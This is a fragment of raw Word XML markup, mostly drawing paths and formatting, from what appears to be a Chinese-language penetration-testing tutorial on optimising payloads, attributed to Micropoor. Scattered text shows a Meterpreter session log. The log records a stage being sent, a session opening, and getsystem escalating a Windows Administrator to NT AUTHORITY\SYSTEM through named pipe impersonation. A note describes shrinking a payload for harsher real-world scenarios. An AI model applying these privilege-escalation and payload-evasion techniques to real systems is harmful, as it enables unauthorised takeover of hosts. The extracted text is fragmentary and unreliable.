4369,9149,4373,9149,4378,9149,4382,9149,4387,9149,4392,9149,4396,9149,4401,9149,4406,9149,4412,9149,4417,9149,4422,9149,4428,9149,4433,9149,4439,9149,4445,9149,4450,9149,4456,9149,4462,9149,4469,9149,4475,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9147,4481,9147,4481,9147,4481,9147,4481,9147,4481,9146,4481,9146,4481,9146,4481,9145,4481,9145,4481,9145,4481,9144,4481,9144,4481,9143,4481,9143,4481,9142,4481,9142,4481,9141,4481,9141,4481,9140,4481,9139,4481,9139,4481,9138,4481,9137,4481,9136,4481,9136,4481,9135,4481,9134,4481,9133,4481,9132,4481,9131,4481,9130,4481,9129,4481,9127,4481,9126,4481,9125,4481,9124,4481,9122,4481,9121,4481,9119,4481,9118,4481,9116,4481,9115,4481,9113,4481,9111,4481,9109,4481,9108,4481,9106,4481,9104,4481,9102,4481,9100,4481,9098,4481,9095,4481,9093,4481,9091,4481,9088,4481,9086,4481,9084,4481,9081,4481,9078,4481,9076,4481,9073,4481,9070,4481,9067,4481,9064,4481,9061,4481,9058,4481,9055,4481,9052,4481,9048,4481,9045,4481,9041,4481,9038,4481,9034,4481,9030,4481,9026,4481,9023,4481,9019,4481,9014,4481,9010,4481,9006,4481,9002,4481,8997,4481,8993,4481,8988,4481,8984,4481,8979,4481,8974,4481,8969,4481,8964,4481,8959,4481,8954,4481,8948,4481,8943,4481,8938,4481,8932,4481,8926,4481,8920,4481,8914,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4480,8908,4480,8908,4480,8908,4480,8908,4480,8908,4479,8908,4479,8908,4479,8908,4479,8908,4478,8908,4478,8908,4478,8908,4477,8908,4477,8908,4476,8908,4476,8908,4475,8908,4475,8908,4474,8908,4474,8908,4473,8908,4472,8908,4472,8908,4471,8908,4470,8908,4469,8908,4468,8908,4467,8908,4467,8908,4466,8908,4465,8908,4463,8908,4462,8908,4461,8908,4460,8908,4459,8908,4457,8908,4456,8908,4455,8908,4453,8908,4452,8908,4450,8908,4449,8908,4447,8908,4445,8908,4443,8908,4442,8908,4440,8908,4438,8908,4436,8908,4434,8908,4432,8908,4429,8908,4427,8908,4425,8908,4422,8908,4420,8908,4417,8908,4415,8908,4412,8908,4409,8908,4407,8908,4404,8908,4401,8908,4398,8908,4395,8908,4392,8908,4388,8908,4385,8908,4382,8908,4378,8908,4375,8908,4371,8908,4367,8908,4363,8908,4359,8908,4356,8908,4351,8908,4347,8908,4343,8908,4339,8908,4334,8908,4330,8908,4325,8908,4321,8908,4316,8908,4311,8908,4306,8908,4301,8908,4296,8908,4291,8908,4285,8908,4280,8908,4274,8908,4269,8908,4263,8908,4257,8908,4251,8908,4245,8908,4239,8908,4233,8908,4226e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:498.500pt;margin-top:210.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9970,4210" coordsize="130,270">
        <v:shape style="position:absolute;left:9970;top:4210;width:130;height:270" coordorigin="9970,4210" coordsize="130,270" path="m9989,4226l9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9990,4226,9990,4226,9990,4226,9990,4226,9990,4226,9990,4226,9990,4226,9990,4226,9990,4226,9991,4226,9991,4226,9991,4226,9991,4226,9991,4226,9992,4226,9992,4226,9992,4226,9992,4226,9993,4226,9993,4226,9993,4226,9994,4226,9994,4226,9994,4226,9995,4226,9995,4226,9996,4226,9996,4226,9996,4226,9997,4226,9997,4226,9998,4226,9998,4226,9999,4226,10000,4226,10000,4226,10001,4226,10002,4226,10002,4226,10003,4226,10004,4226,10004,4226,10005,4226,10006,4226,10007,4226,10008,4226,10009,4226,10010,4226,10010,4226,10011,4226,10012,4226,10013,4226,10015,4226,10016,4226,10017,4226,10018,4226,10019,4226,10020,4226,10022,4226,10023,4226,10024,4226,10026,4226,10027,4226,10028,4226,10030,4226,10031,4226,10033,4226,10034,4226,10036,4226,10038,4226,10039,4226,10041,4226,10043,4226,10045,4226,10046,4226,10048,4226,10050,4226,10052,4226,10054,4226,10056,4226,10058,4226,10060,4226,10062,4226,10065,4226,10067,4226,10069,4226,10072,4226,10074,4226,10076,4226,10079,4226,10081,4226,10084,4226,10086,4226,10089,4226,10092,4226,10095,4226,10097,4226,10100,4226,10103,4226,10106,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4227,10109,4227,10109,4227,10109,4227,10109,4227,10109,4227,10109,4227,10109,4228,10109,4228,10109,4228,10109,4228,10109,4228,10109,4229,10109,4229,10109,4229,10109,4230,10109,4230,10109,4231,10109,4231,10109,4232,10109,4232,10109,4233,10109,4233,10109,4234,10109,4234,10109,4235,10109,4236,10109,4237,10109,4237,10109,4238,10109,4239,10109,4240,10109,4241,10109,4242,10109,4243,10109,4244,10109,4245,10109,4246,10109,4247,10109,4249,10109,4250,10109,4251,10109,4253,10109,4254,10109,4256,10109,4257,10109,4259,10109,4260,10109,4262,10109,4264,10109,4266,10109,4268,10109,4270,10109,4272,10109,4274,10109,4276,10109,4278,10109,4280,10109,4283,10109,4285,10109,4287,10109,4290,10109,4293,10109,4295,10109,4298,10109,4301,10109,4304,10109,4307,10109,4310,10109,4313,10109,4316,10109,4319,10109,4322,10109,4326,10109,4329,10109,4333,10109,4336,10109,4340,10109,4344,10109,4348,10109,4352,10109,4356,10109,4360,10109,4364,10109,4369,10109,4373,10109,4378,10109,4382,10109,4387,10109,4392,10109,4396,10109,4401,10109,4406,10109,4412,10109,4417,10109,4422,10109,4428,10109,4433,10109,4439,10109,4445,10109,4450,10109,4456,10109,4462,10109,4469,10109,4475,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10108,4481,10108,4481,10108,4481,10108,4481,10108,4481,10108,4481,10108,4481,10108,4481,10107,4481,10107,4481,10107,4481,10107,4481,10107,4481,10106,4481,10106,4481,10106,4481,10105,4481,10105,4481,10105,4481,10105,4481,10104,4481,10104,4481,10103,4481,10103,4481,10103,4481,10102,4481,10102,4481,10101,4481,10101,4481,10100,4481,10100,4481,10099,4481,10098,4481,10098,4481,10097,4481,10097,4481,10096,4481,10095,4481,10094,4481,10094,4481,10093,4481,10092,4481,10091,4481,10090,4481,10090,4481,10089,4481,10088,4481,10087,4481,10086,4481,10085,4481,10084,4481,10083,4481,10081,4481,10080,4481,10079,4481,10078,4481,10077,4481,10075,4481,10074,4481,10073,4481,10071,4481,10070,4481,10068,4481,10067,4481,10065,4481,10064,4481,10062,4481,10061,4481,10059,4481,10057,4481,10055,4481,10054,4481,10052,4481,10050,4481,10048,4481,10046,4481,10044,4481,10042,4481,10040,4481,10038,4481,10036,4481,10033,4481,10031,4481,10029,4481,10027,4481,10024,4481,10022,4481,10019,4481,10017,4481,10014,4481,10012,4481,10009,4481,10006,4481,10004,4481,10001,4481,9998,4481,9995,4481,9992,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4480,9989,4480,9989,4480,9989,4480,9989,4480,9989,4479,9989,4479,9989,4479,9989,4479,9989,4478,9989,4478,9989,4478,9989,4477,9989,4477,9989,4476,9989,4476,9989,4475,9989,4475,9989,4474,9989,4474,9989,4473,9989,4472,9989,4472,9989,4471,9989,4470,9989,4469,9989,4468,9989,4467,9989,4467,9989,4466,9989,4465,9989,4463,9989,4462,9989,4461,9989,4460,9989,4459,9989,4457,9989,4456,9989,4455,9989,4453,9989,4452,9989,4450,9989,4449,9989,4447,9989,4445,9989,4443,9989,4442,9989,4440,9989,4438,9989,4436,9989,4434,9989,4432,9989,4429,9989,4427,9989,4425,9989,4422,9989,4420,9989,4417,9989,4415,9989,4412,9989,4409,9989,4407,9989,4404,9989,4401,9989,4398,9989,4395,9989,4392,9989,4388,9989,4385,9989,4382,9989,4378,9989,4375,9989,4371,9989,4367,9989,4363,9989,4359,9989,4356,9989,4351,9989,4347,9989,4343,9989,4339,9989,4334,9989,4330,9989,4325,9989,4321,9989,4316,9989,4311,9989,4306,9989,4301,9989,4296,9989,4291,9989,4285,9989,4280,9989,4274,9989,4269,9989,4263,9989,4257,9989,4251,9989,4245,9989,4239,9989,4233,9989,4226e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:242.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,4850" coordsize="130,270">
        <v:shape style="position:absolute;left:3490;top:4850;width:130;height:270" coordorigin="3490,4850" coordsize="130,270" path="m3506,4871l3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3507,4871,3507,4871,3507,4871,3507,4871,3507,4871,3507,4871,3507,4871,3508,4871,3508,4871,3508,4871,3508,4871,3508,4871,3509,4871,3509,4871,3509,4871,3509,4871,3510,4871,3510,4871,3510,4871,3511,4871,3511,4871,3511,4871,3512,4871,3512,4871,3513,4871,3513,4871,3514,4871,3514,4871,3515,4871,3515,4871,3516,4871,3516,4871,3517,4871,3518,4871,3518,4871,3519,4871,3520,4871,3520,4871,3521,4871,3522,4871,3523,4871,3524,4871,3524,4871,3525,4871,3526,4871,3527,4871,3528,4871,3529,4871,3530,4871,3531,4871,3532,4871,3533,4871,3535,4871,3536,4871,3537,4871,3538,4871,3540,4871,3541,4871,3542,4871,3544,4871,3545,4871,3547,4871,3548,4871,3550,4871,3551,4871,3553,4871,3554,4871,3556,4871,3558,4871,3559,4871,3561,4871,3563,4871,3565,4871,3567,4871,3569,4871,3571,4871,3573,4871,3575,4871,3577,4871,3579,4871,3581,4871,3584,4871,3586,4871,3588,4871,3591,4871,3593,4871,3596,4871,3598,4871,3601,4871,3603,4871,3606,4871,3609,4871,3611,4871,3614,4871,3617,4871,3620,4871,3623,4871,3626,4871,3626,4871,3626,4871,3626,4871,3626,4871,3626,4871,3626,4871,3626,4871,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4873,3626,4873,3626,4873,3626,4873,3626,4874,3626,4874,3626,4874,3626,4874,3626,4875,3626,4875,3626,4876,3626,4876,3626,4876,3626,4877,3626,4877,3626,4878,3626,4879,3626,4879,3626,4880,3626,4880,3626,4881,3626,4882,3626,4883,3626,4883,3626,4884,3626,4885,3626,4886,3626,4887,3626,4888,3626,4889,3626,4890,3626,4892,3626,4893,3626,4894,3626,4895,3626,4897,3626,4898,3626,4899,3626,4901,3626,4903,3626,4904,3626,4906,3626,4908,3626,4909,3626,4911,3626,4913,3626,4915,3626,4917,3626,4919,3626,4921,3626,4923,3626,4926,3626,4928,3626,4930,3626,4933,3626,4935,3626,4938,3626,4941,3626,4943,3626,4946,3626,4949,3626,4952,3626,4955,3626,4958,3626,4961,3626,4964,3626,4968,3626,4971,3626,4975,3626,4978,3626,4982,3626,4986,3626,4989,3626,4993,3626,4997,3626,5001,3626,5005,3626,5010,3626,5014,3626,5018,3626,5023,3626,5027,3626,5032,3626,5037,3626,5042,3626,5047,3626,5052,3626,5057,3626,5062,3626,5068,3626,5073,3626,5079,3626,5084,3626,5090,3626,5096,3626,5102,3626,5108,3626,5114,3626,5120,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3624,5127,3624,5127,3624,5127,3624,5127,3624,5127,3623,5127,3623,5127,3623,5127,3623,5127,3623,5127,3622,5127,3622,5127,3622,5127,3621,5127,3621,5127,3621,5127,3620,5127,3620,5127,3619,5127,3619,5127,3618,5127,3618,5127,3617,5127,3617,5127,3616,5127,3616,5127,3615,5127,3615,5127,3614,5127,3613,5127,3613,5127,3612,5127,3611,5127,3610,5127,3610,5127,3609,5127,3608,5127,3607,5127,3606,5127,3605,5127,3604,5127,3603,5127,3602,5127,3601,5127,3600,5127,3599,5127,3598,5127,3597,5127,3596,5127,3595,5127,3593,5127,3592,5127,3591,5127,3589,5127,3588,5127,3587,5127,3585,5127,3584,5127,3582,5127,3581,5127,3579,5127,3577,5127,3576,5127,3574,5127,3572,5127,3570,5127,3569,5127,3567,5127,3565,5127,3563,5127,3561,5127,3559,5127,3557,5127,3555,5127,3552,5127,3550,5127,3548,5127,3546,5127,3543,5127,3541,5127,3539,5127,3536,5127,3534,5127,3531,5127,3528,5127,3526,5127,3523,5127,3520,5127,3517,5127,3515,5127,3512,5127,3509,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5125,3506,5125,3506,5125,3506,5125,3506,5124,3506,5124,3506,5124,3506,5124,3506,5123,3506,5123,3506,5122,3506,5122,3506,5122,3506,5121,3506,5121,3506,5120,3506,5120,3506,5119,3506,5118,3506,5118,3506,5117,3506,5116,3506,5115,3506,5115,3506,5114,3506,5113,3506,5112,3506,5111,3506,5110,3506,5109,3506,5108,3506,5106,3506,5105,3506,5104,3506,5103,3506,5101,3506,5100,3506,5099,3506,5097,3506,5095,3506,5094,3506,5092,3506,5090,3506,5089,3506,5087,3506,5085,3506,5083,3506,5081,3506,5079,3506,5077,3506,5075,3506,5072,3506,5070,3506,5068,3506,5065,3506,5063,3506,5060,3506,5057,3506,5055,3506,5052,3506,5049,3506,5046,3506,5043,3506,5040,3506,5037,3506,5034,3506,5030,3506,5027,3506,5023,3506,5020,3506,5016,3506,5012,3506,5009,3506,5005,3506,5001,3506,4997,3506,4993,3506,4988,3506,4984,3506,4980,3506,4975,3506,4971,3506,4966,3506,4961,3506,4956,3506,4951,3506,4946,3506,4941,3506,4936,3506,4931,3506,4925,3506,4920,3506,4914,3506,4908,3506,4902,3506,4896,3506,4890,3506,4884,3506,4878,3506,4871e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:298.800pt;width:467.400pt;height:141.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId42" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:636.0pt;width:7.200pt;height:8.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId4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Sending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stage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179779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bytes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.119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session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11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opened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.5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389</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6366" w:firstLine="15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4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at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2019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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>01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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>27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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>30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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0500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6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getuid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11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Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12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username: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WIN03X64\Administrator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getpid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pid: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3152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getsystem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got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system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via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technique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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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Named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Pipe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Impersonation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In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Memory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Adm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in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.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8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meterpreter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getuid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Server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username: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NT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AUTHORITY\SYSTEM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105"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第四次优化payl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="105"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oad：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w w:val="62"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="62"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>...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文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中的前三次优化，三次生成，已满足大部分实战场景。当遇到更苛刻的实战场景，75776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1"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字节优化到317</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="101"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4字节，接下来的季中，会继续优化。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w w:val="111"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="111"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ropoor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	<Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/42.jpeg" />
	<Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/43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